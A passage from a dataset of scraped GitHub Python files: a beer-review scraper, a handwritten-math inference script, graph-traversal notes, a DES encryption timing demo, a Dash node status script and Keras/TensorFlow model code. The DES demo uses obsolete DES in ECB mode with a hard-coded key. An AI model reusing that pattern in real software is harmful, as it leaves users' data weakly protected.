')}\n def __init__(self, beer_uid, name=None, abv=None, mean_score=None, overall_percentile=None,\n style_percentile=None, total_ratings=None, brewery_id=None):\n self.uid = int(beer_uid)\n self.name = name\n if abv:\n self.abv = float(abv)\n if mean_score:\n self.mean_score = float(mean_score)\n if overall_percentile:\n self.overall_percentile=float(overall_percentile)\n if style_percentile:\n self.style_percentile=float(style_percentile)\n if total_ratings:\n self.total_ratings=int(total_ratings)\n if brewery_id:\n self.brewery_id=int(brewery_id)\n def __str__(self):\n return \"'{0}' from {1}\".format(self.name, Beer.beer_uri.format(beer_id=self.uid))\n\n def fetch_beer_page(self, page=None):\n \"\"\"\n returns html string of the beer page\n \"\"\"\n if page:\n #logging.debug('opening ' + Beer.beer_uri.format(beer_id=self.uid)+'1/{0}/'.format(page))\n return urllib2.urlopen(Beer.beer_uri.format(beer_id=self.uid)+'1/{0}/'.format(page)).read()\n else:\n logging.debug('opening ' + Beer.beer_uri.format(beer_id=self.uid))\n return urllib2.urlopen(Beer.beer_uri.format(beer_id=self.uid)).read()\n\n def parse_metadata(self, raw_page=None):\n \"\"\"\n scrapes the beer metadata out of a beer's raw_page string\n Note! overrides existing metadata,\n catches non-existance for abv and mean score as these aren't on every beer page\n \"\"\"\n if not raw_page:\n raw_page = self.fetch_beer_page()\n self.name = Beer.get_metadata['name'].findall(raw_page)[0]\n try:\n self.abv = float(Beer.get_metadata['abv'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find abv for beer {0}\".format(self.uid))\n self.abv = None\n try:\n self.mean_score = float(Beer.get_metadata['mean'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find mean score for beer {0}\".format(self.uid))\n self.mean_score = None\n try:\n self.weighted_score = float(Beer.get_metadata['weighted_score'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find weighted score for beer {0}\".format(self.uid))\n self.weighted_score = None\n try:\n self.overall_percentile=float(Beer.get_metadata['overall_percentile'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find overall percentile for beer {0}\".format(self.uid))\n self.overall_percentile = None\n try:\n self.style_percentile=float(Beer.get_metadata['style_percentile'].findall(raw_page)[0])\n except IndexError:\n logging.warning(\"unable to find style_percentile for beer {0}\".format(self.uid))\n self.style_percentile = None\n self.total_ratings=int(Beer.get_metadata['total_ratings'].findall(raw_page)[0])\n self.brewery_id=int(Beer.get_metadata['brewery_and_style'].findall(raw_page)[0][0])\n try:\n self.style_id=int(Beer.get_metadata['brewery_and_style'].findall(raw_page)[0][1])\n except IndexError:\n logging.warning(\"unable to find style_id for beer {0}\".format(self.uid))\n self.style_id = None\n def fetch_rating_page(self):\n \"\"\"\n returns the html string of the minimized rating list\n \"\"\"\n return urllib2.urlopen(Beer.ratings_uri.format(beer_id=self.uid)).read()\n\n def scrape_user_rating_list(self, raw_page=None):\n \"\"\"\n scrapes the minimized user comment list (basically just ratings),\n creating a list of tuples in self.ratings where each tuple takes the form\n (username, userID, beerRating)\n username is a str, userID an int, and beerRating a float\n the prime advantage of this over scrape_user_comment_list is that it\n takes only one http GET to fetch this entire list, while gathering full\n comments and ratings by beer takes N/10 GETs where N is the number of\n comments (though there may be undocumented means of increasing the page size)\n \"\"\"\n if not raw_page:\n raw_page = self.fetch_rating_page()\n self.ratings = [(username, int(userID), float(beerRating))\n for (userID, username, beerID, beerRating) in Beer.ratings_regex.findall(raw_page)]\n\n def scrape_user_comment_list(self, raw_page=None):\n if not raw_page:\n raw_page = self.fetch_beer_page()\n self.reviews = []\n try:\n self.total_ratings\n except AttributeError:\n self.parse_metadata(raw_page)\n page = 1\n while len(self.reviews) < self.total_ratings:\n if page != 1:\n raw_page = self.fetch_beer_page(page=page)\n self.reviews +=[Review(beer_uid=self.uid, user_uid=int(user_id),\n brewery_uid =self.brewery_id, topline_score=float(topline_score),\n aroma_score=int(aroma), apperance_score=int(apperance),\n taste_score=int(taste), palete_score=int(palete),\n overall_score=int(overall), user_loc=user_loc,\n date = datetime.datetime.strptime(date_str, '%b %d, %Y').date(),\n comment = comment) for (topline_score, aroma, apperance,\n taste, palete, overall, user_id, user_name, user_loc,\n date_str, comment) in \\\n Beer.reviews_regex.findall(raw_page)]\n page += 1\n if page-1 > self.total_ratings/8.0:\n logging.error('parsing should have completed, but did not, forcing.')\n break\n\nclass BeerTests(unittest.TestCase):\n def setUp(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "gearmonkey/consume-rBeer", "sub_path": "src/Beer.py", "file_name": "Beer.py", "file_ext": "py", "file_size_in_byte": 9449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.compile", "line_number": 17, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 81, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 86, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 98, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 104, "usage_type": "call"}, {"api_name": "Review.Review", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 146, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 149, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "24062637809", "text": "import os\nimport cv2\nfrom datetime import datetime\nimport numpy as np\n# import argparse\nimport torch\nfrom time import process_time\nimport json\nfrom tqdm import tqdm\n \n\nfrom .utils import load_config, load_checkpoint\nfrom .infer.Backbone import Backbone\nfrom .dataset import Words\nfrom .utils import updata_lr, Meter, cal_score\nfrom .dataset import get_dataset\n\nfrom difflib import SequenceMatcher\n\n\n\ndef Make_inference(checkpointFolder,wordsPath,configPath,checkpointPath,device,imagePath='data/Base_soma_subtracao/val/val_images',labelPath='data/Base_soma_subtracao/val/val_labels.txt', date= \"12/12/2012 12:12:12.121212\"):\n #parser = argparse.ArgumentParser(description='Spatial channel attention')\n #parser.add_argument('--config', default='./checkpoints/model_1/config.yaml', type=str, help='配置文件路径')\n #parser.add_argument('--image_path', default='data/DataBase/test/test_images', type=str, help='测试image路径')\n #parser.add_argument('--image_path', default='data/new_test/images', type=str, help='测试image路径')\n #parser.add_argument('--image_path', default='data/Base_soma_subtracao/val/val_images', type=str, help='')\n #parser.add_argument('--label_path', default='data/DataBase/test/test_labels.txt', type=str, help='测试label路径')\n #parser.add_argument('--label_path', default='data/new_test/labels.txt', type=str, help='测试label路径')\n #parser.add_argument('--label_path', default='data/Base_soma_subtracao/val/val_labels.txt', type=str, help='')\n #args = parser.parse_args()\n\n \n\n if not configPath:\n print('请提供config yaml路径!')\n exit(-1)\n\n \"\"\"加载config文件\"\"\"\n params = load_config(configPath)\n\n\n # device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # device = 'cpu'\n params['device'] = device\n\n #words = Words(params['word_path'])\n words = Words(wordsPath)\n params['word_num'] = len(words)\n params['struct_num'] = 7\n params['words'] = words\n params['word_path'] = wordsPath\n\n params['checkpoint'] = checkpointPath\n\n model = Backbone(params)\n model = model.to(device)\n\n # load_checkpoint(model, None, params['checkpoint'])\n state = torch.load(params['checkpoint'], map_location='cpu')\n\n model.load_state_dict(state['model'])\n\n model.eval()\n\n # train_loader, eval_loader = get_dataset(params)\n\n # loss_meter_eval, word_right_eval, struct_right_eval, exp_right_eval = eval(params= params,model= model)\n\n\n word_right, node_right, exp_right, length, cal_num = 0, 0, 0, 0, 0\n\n with open(labelPath) as f:\n labels = f.readlines()\n\n def convert(nodeid, gtd_list):\n isparent = False\n child_list = []\n for i in range(len(gtd_list)):\n if gtd_list[i][2] == nodeid:\n isparent = True\n child_list.append([gtd_list[i][0],gtd_list[i][1],gtd_list[i][3]])\n if not isparent:\n return [gtd_list[nodeid][0]]\n else:\n if gtd_list[nodeid][0] == '\\\\frac':\n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] == 'Above':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Below':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Right':\n return_string += convert(child_list[i][1], gtd_list)\n for i in range(len(child_list)):\n if child_list[i][2] not in ['Right','Above','Below']:\n return_string += ['illegal']\n \n #TESTE--------------------------\n elif gtd_list[nodeid][0] == '\\\\overset':\n \n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] == 'Sup':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Below':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Right':\n return_string += convert(child_list[i][1], gtd_list)\n for i in range(len(child_list)):\n if child_list[i][2] not in ['Right','Sup','Below']:\n return_string += ['illegal']\n #-------------------------------\n else:\n return_string = [gtd_list[nodeid][0]]\n for i in range(len(child_list)):\n if child_list[i][2] in ['l_sup']:\n return_string += ['['] + convert(child_list[i][1], gtd_list) + [']']\n for i in range(len(child_list)):\n if child_list[i][2] == 'Inside':\n return_string += ['{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Sub','Below']:\n return_string += ['_','{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Sup','Above']:\n return_string += ['^','{'] + convert(child_list[i][1], gtd_list) + ['}']\n for i in range(len(child_list)):\n if child_list[i][2] in ['Right']:\n return_string += convert(child_list[i][1], gtd_list)\n return return_string\n\n\n with torch.no_grad():\n bad_case = {}\n pred_times={}\n word_right={}\n inferences_awnser={}\n pred_time_mean = 0\n word_right_mean = 0\n pred_time_std = 0\n word_right_std = 0\n\n \n for item in tqdm(labels):\n name, *label = item.split()\n label = ' '.join(label)\n #if name.endswith('.jpg'):\n # name = name.split('.')[0]\n img = cv2.imread(os.path.join(imagePath, name))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n dim = (150, 150)\n img = cv2.resize(img, (dim), interpolation=cv2.INTER_AREA)\n\n image = torch.Tensor(img) / 255\n image = image.unsqueeze(0).unsqueeze(0)\n\n image_mask = torch.ones(image.shape)\n image, image_mask = image.to(device), image_mask.to(device)\n\n #medir tempo\n pred_start = process_time()\n prediction = model(image, image_mask)\n pred_end = process_time()\n \n pred_time = pred_end-pred_start\n pred_times[name]=pred_time\n #medir tempo\n\n latex_list = convert(1, prediction)\n latex_string = ' '.join(latex_list)\n\n \n # print(latex_string)\n # cv2.imshow('image', img)\n #\n # cv2.waitKey()\n\n\n if latex_string == label.strip():\n print(\"ACERTOU!\")\n exp_right += 1\n inferences_awnser[name]=(latex_string + \" ---> V\")\n else:\n print(\"ERROU!\")\n inferences_awnser[name]=(latex_string + \" ---> X\")\n bad_case[name] = {\n 'label': label,\n 'predi': latex_string,\n 'list': prediction\n }\n #Word_right-------------------------\n\n latex_prediction_list = latex_string.split() \n label_list = label.strip().split()\n\n print(\"latex_prediction_list: \" + str(latex_prediction_list))\n print(\"label_list: \" + str(label_list))\n\n word_right_ratio = SequenceMatcher(None,latex_string,label.strip(),autojunk=False).ratio()\n print(\"word_right_ratio: \" + str(word_right_ratio))\n\n word_right[name]=word_right_ratio\n #-----------------------------------\n\n pred_time_mean = np.array(list(pred_times.values())).mean()\n word_right_mean = np.array(list(word_right.values())).mean()\n exp_rate = exp_right / len(labels)\n pred_time_std = np.array(list(pred_times.values())).std()\n word_right_std = np.array(list(word_right.values())).std()\n \n\n #CRIAR PASTA\n # inferences_directory = os.path.join(checkpointFolder,\"inferences -\" + str(date))\n # if not os.path.exists(inferences_directory):\n # os.makedirs(inferences_directory)\n # #print(str(inferences_awnser))\n # with open(os.path.join(inferences_directory,\"prediction times - mean \"+str(pred_time_mean).replace(\".\",\",\")+\"s.txt\"),\"w+\", encoding='UTF8') as f:\n # f.write(str(pred_times))\n # f.close()\n # with open(os.path.join(inferences_directory,\"inferences - exp_rate- \"+str(exp_rate).replace(\".\",\",\")+\".txt\"),\"w+\", encoding='UTF8') as g:\n # g.write(str(inferences_awnser))\n # g.close()\n\n with open('bad_case.json', 'w') as f:\n json.dump(bad_case, f, ensure_ascii=False)\n\n return exp_rate, pred_time_mean, word_right_mean, pred_time_std, word_right_std, device, params[\"experiment\"]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "multi-megaman/Train_and_infer", "sub_path": "SAN/for_mass_inference.py", "file_name": "for_mass_inference.py", "file_ext": "py", "file_size_in_byte": 9515, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.load_config", "line_number": 40, "usage_type": "call"}, {"api_name": "dataset.Words", "line_number": 48, "usage_type": "call"}, {"api_name": "infer.Backbone.Backbone", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 138, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 155, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.INTER_AREA", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 167, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 169, "usage_type": "call"}, {"api_name": "difflib.SequenceMatcher", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 215, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 231, "usage_type": "call"}]} +{"seq_id": "17682608721", "text": "\"\"\"\nGraph Traversal - Algorithm to visit every vertex of a graph\n\nExplorer that continues to explore new vertices as we see them until we hit a dead end in which case\nyou'll retrace your steps and continue exploration.\n\nDepth-first = Stack - LIFO\nDepth = long - vertical before horizontal\n1.) Pre-order - O(n)\n2.) In-order - O(n)\n3.) Post-order - O(n)\n\"\"\"\n\n# Pre-order tree traversal\n'1.) Visit node'\n'2.) Traverse left'\n'3.) Traverse right'\n\n\"\"\"\nPseudocode\n\npreorder(node)\n if node == null then return\n visit(node)\n preorder(node.left)\n preorder(node.right)\n\"\"\"\n\n# In-order tree traversal\n\n'1.) Traverse left'\n'2.) Visit node'\n'3.) Traverse right'\n\n\"\"\"\nPseudocode\n\ninorder(node)\n if node == null then return\n inorder(node.left)\n visit(node)\n inorder(node.right)\n\"\"\"\n\n# Post-order tree traversal\n\n'1.) Traverse left'\n'2.) Traverse right'\n'3.) Visit node'\n\n\"\"\"\nPseudocode\n\npostorder(node)\n if node == null then return\n postorder(node.left)\n postorder(node.right)\n visit(node)\n\"\"\"\n\n\nfrom collections import deque\n\n\ngraph = {\n 'A' : ['B', 'G'],\n 'B' : ['C', 'D', 'E'],\n 'C' : [],\n 'D' : [],\n 'E' : ['F'],\n 'F' : [],\n 'G' : ['H'],\n 'H' : ['I'],\n 'I' : []\n}\n\ndef dfs(graph, node):\n visited = []\n stack = deque()\n\n visited.append(node)\n stack.append(node)\n\n while stack:\n s = stack.pop()\n print(s, end=' ')\n\n for n in reversed(graph[s]):\n if n not in visited:\n visited.append(n)\n stack.append(n)\n\n\ndef dfs(al):\n stack = ['g']\n visited = []\n\n while stack:\n node = stack.pop()\n if node not in visited:\n visited.append(node)\n # for x in al[node]:\n # stack.append(x)\n [stack.append(x) for x in al[node]]\n print(visited)", "repo_name": "JuanTGit/practice", "sub_path": "Interview Concepts/DFS.py", "file_name": "DFS.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "3536625087", "text": "from Crypto.Cipher import DES\nfrom Crypto.Util.Padding import pad\nfrom time import *\n\n\ndef des(plaintext):\n \"\"\"\n :param plaintext: plaintext to be encrypted\n :return: encryption time\n \"\"\"\n key = b'a 8b key' # 秘钥长度为8Byte\n begin = time()\n plaintext_pad = pad(plaintext.encode(), 16, style='pkcs7')\n Des = DES.new(key, DES.MODE_ECB) # 生成一个DES对象\n end = time()\n ciphertext = Des.encrypt(plaintext_pad)\n Des = DES.new(key, DES.MODE_ECB)\n decrypt_text = Des.decrypt(ciphertext).decode()\n with open(\"../cipher.txt\", \"a\") as f:\n f.write(\"DES加密:\\n\" + ciphertext.hex() + '\\n')\n f.write(\"DES解密:\\n\" + decrypt_text[:len(plaintext)] + \"\\n\\n\")\n\n return end - begin\n", "repo_name": "hty0111/Cybersecurity-for-Cyber-Physical-Systems", "sub_path": "code/DES.py", "file_name": "DES.py", "file_ext": "py", "file_size_in_byte": 743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Crypto.Util.Padding.pad", "line_number": 13, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES.new", "line_number": 14, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES", "line_number": 14, "usage_type": "name"}, {"api_name": "Crypto.Cipher.DES.MODE_ECB", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.DES.new", "line_number": 17, "usage_type": "call"}, {"api_name": "Crypto.Cipher.DES", "line_number": 17, "usage_type": "name"}, {"api_name": "Crypto.Cipher.DES.MODE_ECB", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "34673011936", "text": "\"\"\"\nPrints a status line for the dash node to be called from the outside of the container\n\"\"\"\nimport subprocess\nimport json\n\n# Print dashd status\ndef dash_cli(commands):\n \"\"\"Run dash-cli commands\"\"\"\n result = subprocess.run(['dash-cli', '-conf=/dash/dash.conf', '--rpcclienttimeout=1'] +\n commands, check=False, capture_output=True, text=True)\n if result.returncode != 0:\n #print(f\"Error running dash-cli. Command: \\ndash-cli {' '.join(commands)}\\nOutput: \\n{result.stderr}\")\n raise Exception(result.stderr)\n return result.stdout.strip()\ntry:\n connectioncount = dash_cli(['getconnectioncount'])\nexcept:\n connectioncount = \"E\"\ntry:\n blocks = json.loads(dash_cli(['getblockchaininfo'])).get('blocks')\nexcept:\n blocks = \"E\"\ntry:\n mn_status = json.loads(dash_cli(['masternode', 'status'])).get('status')\nexcept:\n mn_status = \"-\"\n\nprint(f\"Clients: {connectioncount} \\tBlocks: {blocks} \\tMN: {mn_status}\")\n", "repo_name": "dash-tor/proof-of-concept", "sub_path": "src/status.py", "file_name": "status.py", "file_ext": "py", "file_size_in_byte": 971, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.run", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "27604033502", "text": "import tensorflow as tf\nfrom pdb import set_trace\nfrom util import *\nimport numpy as np\nimport scipy.io\n\ndef _conv_layer(input, weights, bias):\n conv = tf.nn.conv2d(input, weights, strides=(1, 1, 1, 1),\n padding='SAME')\n return tf.nn.bias_add(conv, bias)\n\ndef _pool_layer(input):\n return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),\n padding='SAME')\n\ndef preprocess(image, mean_pixel):\n return image - mean_pixel\n\ndef undo_preprocess(image, mean_pixel):\n return image + mean_pixel\n\nclass VGG19:\n layers = (\n 'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n\n 'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n\n 'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n 'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n\n 'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n 'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n\n 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n 'relu5_3', 'conv5_4', 'relu5_4'\n )\n\n def __init__(self):\n data = scipy.io.loadmat('imagenet-vgg-verydeep-19.mat')\n\n self.mean_pixel = np.array([123.68, 116.779, 103.939])\n\n self.weights = data['layers'][0]\n\n def load_weights(self):\n self.net = {}\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == 'conv':\n kernels = self.weights[i][0][0][2][0][0]\n bias = self.weights[i][0][0][2][0][1]\n\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n bias = bias.reshape(-1)\n self.net['{}_kernel'.format(name)] = tf.Variable(kernels, \\\n name='{}_kernel'.format(name))\n self.net['{}_bias'.format(name)] = tf.Variable(bias, \\\n name='{}_bias'.format(name))\n\n def preprocess(self, image):\n return image-self.mean_pixel\n\n def undo_preprocess(self, image):\n return image+self.mean_pixel\n\n def feed_forward(self, input_image, scope='VGGController'):\n net = {}\n\n with tf.name_scope('%s_preprocess' % scope):\n current = self.preprocess(input_image)\n\n with tf.variable_scope(scope):\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == 'conv':\n kernels = self.net['{}_kernel'.format(name)]\n bias = self.net['{}_bias'.format(name)]\n current = _conv_layer(current, kernels, bias)\n elif kind == 'relu':\n current = tf.nn.relu(current)\n elif kind == 'pool':\n current = _pool_layer(current)\n net[name] = current\n\n return net\n", "repo_name": "darshanthaker/kShotActionRecognition", "sub_path": "src/vgg19.py", "file_name": "vgg19.py", "file_ext": "py", "file_size_in_byte": 2924, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.nn.conv2d", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.bias_add", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "scipy.io.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 82, "usage_type": "attribute"}]} +{"seq_id": "6679906165", "text": "import json\nimport xlwt\n\n\ndef read_text():\n with open(\"numbers.txt\", encoding='UTF-8') as f:\n return f.read()\n\n\ndef write_excel(infos: dict):\n workbook = xlwt.Workbook()\n worksheet = workbook.add_sheet('numbers')\n\n for row_index,row in enumerate(infos):\n for column_index,column_value in enumerate(row):\n worksheet.write(row_index, column_index, label=column_value)\n\n workbook.save(\"numbers.xls\")\n\n\nif __name__ == \"__main__\":\n text = read_text()\n infos = json.loads(text)\n print(infos)\n write_excel(infos)\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0016/0016.py", "file_name": "0016.py", "file_ext": "py", "file_size_in_byte": 558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "xlwt.Workbook", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "7826214759", "text": "'''\r\nThe model is designed to practice transfer learning and data augment.\r\nThe reason why I imported 'os' is about a mistake of the package 'h5py'.\r\nAlthough I had searched and tried tons of ways to fix it, it was still there.\r\n\r\nAfter reading passages from the Internet, I think there should be two ways to\r\nimply transfer learning.\r\n\r\nThe first way is you utilize a well-defined model like VGG16 to get an initial output.\r\nThen taking the output as an input, you will define your own model and train this model.\r\n\r\nThe second way is to connect a well-defined model and self-defined model. Then freeze the\r\nparameters of well-defined model and only train on the residual parts. And if you like, you\r\ncan train the whole model without any frozen layers.\r\n\r\nThe greatest merit of transfer learning, obviously, is effortless and energy-saving.\r\nEspecially when you do not have a powerful computer, like me now at home, it really helps a lot.\r\n\r\nReferences:\r\nhttps://blog.keras.io/building-powerful-image-classification-models-using-very-little-data.html\r\nhttps://riptutorial.com/keras/example/32608/transfer-learning-using-keras-and-vgg\r\n'''\r\n\r\nimport os\r\nos.environ['HDF5_DISABLE_VERSION_CHECK'] = '2'\r\nimport pickle\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Dense, Flatten, Dropout, Input\r\nfrom keras.optimizers import SGD\r\nfrom keras import applications\r\nfrom keras.utils import to_categorical\r\n\r\n# This function is uesed to data. And the data used here is cifar-10, which can be downloaded\r\n# from the public site easily.\r\ndef readData(path):\r\n files = os.listdir(path)\r\n data = np.empty([len(files), 10000, 3072])\r\n labels = np.empty([len(files), 10000])\r\n for i, file in enumerate(files):\r\n with open(path + '/' + file, 'rb') as f:\r\n dict = pickle.load(f, encoding='bytes')\r\n data[i] = dict[b'data']\r\n labels[i] = dict[b'labels']\r\n # print(data[i].shape)\r\n # print(labels[i].shape)\r\n print('read success')\r\n return data, labels\r\n\r\n\r\n# This function can transfer the raw data into our desire format.\r\n# np.moveaxis() can help to switch between channel-first mode and channel-last.\r\ndef dataPreprocess(train_path, validation_path, test_path):\r\n train_data, train_labels = readData(train_path)\r\n validation_data, validation_labels = readData(validation_path)\r\n test_data, test_labels = readData(test_path)\r\n\r\n print('read Success')\r\n\r\n print(\"train_data: \", train_data.shape)\r\n print(\"train_labels: \", train_labels.shape)\r\n\r\n print(\"validation_data: \", validation_data.shape)\r\n print(\"validation_labels: \", validation_labels.shape)\r\n\r\n print(\"test_data: \", test_data.shape)\r\n print(\"test_labels: \", test_labels.shape)\r\n\r\n train_data = train_data.reshape((-1, 3, 32, 32))\r\n train_data = np.moveaxis(train_data, 1, -1)\r\n train_labels = train_labels.reshape((-1, 1))\r\n\r\n validation_data = validation_data.reshape((-1, 3, 32, 32))\r\n validation_data = np.moveaxis(validation_data, 1, -1)\r\n validation_labels = validation_labels.reshape((-1, 1))\r\n\r\n test_data = test_data.reshape((-1, 3, 32, 32))\r\n test_data = np.moveaxis(test_data, 1, -1)\r\n test_labels = test_labels.reshape((-1, 1))\r\n\r\n print('after reshape: ')\r\n\r\n print(\"train_data: \", train_data.shape)\r\n print(\"train_labels: \", train_labels.shape)\r\n\r\n print(\"validation_data: \", validation_data.shape)\r\n print(\"validation_labels: \", validation_labels.shape)\r\n\r\n print(\"test_data: \", test_data.shape)\r\n print(\"test_labels: \", test_labels.shape)\r\n\r\n return train_data, train_labels, validation_data, validation_labels, test_data, test_labels\r\n\r\n\r\n# This function works to use VGG net to pre-process data and save the output as my model's input.\r\n# Here the data augment has been applied. The generator works in loops to generate 'batch_size'\r\n# pieces of data and, because of it, we have to set \"steps\" in the predict or fit function to\r\n# avoid endless loops.\r\ndef transVGGModel(train_data, train_labels, batch_size, file_name):\r\n datagen = ImageDataGenerator(rotation_range=10, width_shift_range=0.1, height_shift_range=0.1,\r\n horizontal_flip=True, vertical_flip=True, rescale=1.0 / 255)\r\n generator = datagen.flow(x=train_data, y=train_labels, batch_size=batch_size)\r\n model = applications.VGG16(include_top=False, weights='imagenet')\r\n step_num = train_data.shape[0] // batch_size\r\n bottlenect_feature = 